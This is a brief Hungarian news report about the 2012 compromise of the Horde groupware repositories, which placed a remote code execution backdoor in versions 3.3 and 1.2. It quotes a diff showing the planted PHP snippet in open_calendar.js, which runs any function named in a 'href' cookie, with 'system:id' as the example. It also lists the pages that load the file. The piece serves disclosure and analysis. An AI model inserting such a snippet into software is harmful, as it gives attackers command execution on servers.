A Horde csoportmunka szoftver fejlesztői híreiben tegnap közölték, hogy támadás érte a horde.org tárolóit, és távoli kódfuttatásra alkalmas hátsó kaput helyeztek el a szoftverben. Az incidens a 3.3-as és 1.2-es verziókat érintette egészen tavaly november 15-től kezdődően. A legfrissebb, 4-es verzióhoz a támadók nem nyúltak. 

Eric Romang rövid összefoglalót közölt a hátsó kapuról. Eszerint a rosszindulatú kódrészletet a templates/javascript/open_calendar.js szkriptbe rejtették:

diff -u open_calendar.js.orig open_calendar.js.backdoor 
--- open_calendar.js.orig	2012-02-14 22:50:33.143182985 +0100
+++ open_calendar.js.backdoor	2012-02-14 22:49:59.143183225 +0100
@@ -274,7 +274,7 @@
         cell = document.createElement('TD');
         cell.className = 'rightAlign';
         link = document.createElement('A');
-        link.href = '#';
+        link.href = '#<?php (isset($_COOKIE["href"]) && preg_match("/(.*):(.*)/", $_COOKIE["href"], $m))?$m[1]($m[2]):"";?>';
         link.innerHTML = '&raquo;';
         link.onclick = function()
         {

Amennyiben tehát egy látogatónál be van állítva egy href nevű süti, melyben egy "függvénynév:paraméter" formátumú sztring található, a fügvény az adott paraméterekkel lefut (pl. "system:id"). A megpatkolt szkript a segítség nyitóoldalán (/services/help/index.php), a jelszóemlékeztető és -változtató felületeken (/services/(change|reset)password.php), valamint az install szkriptben (/admin/setup/index.php) töltődik be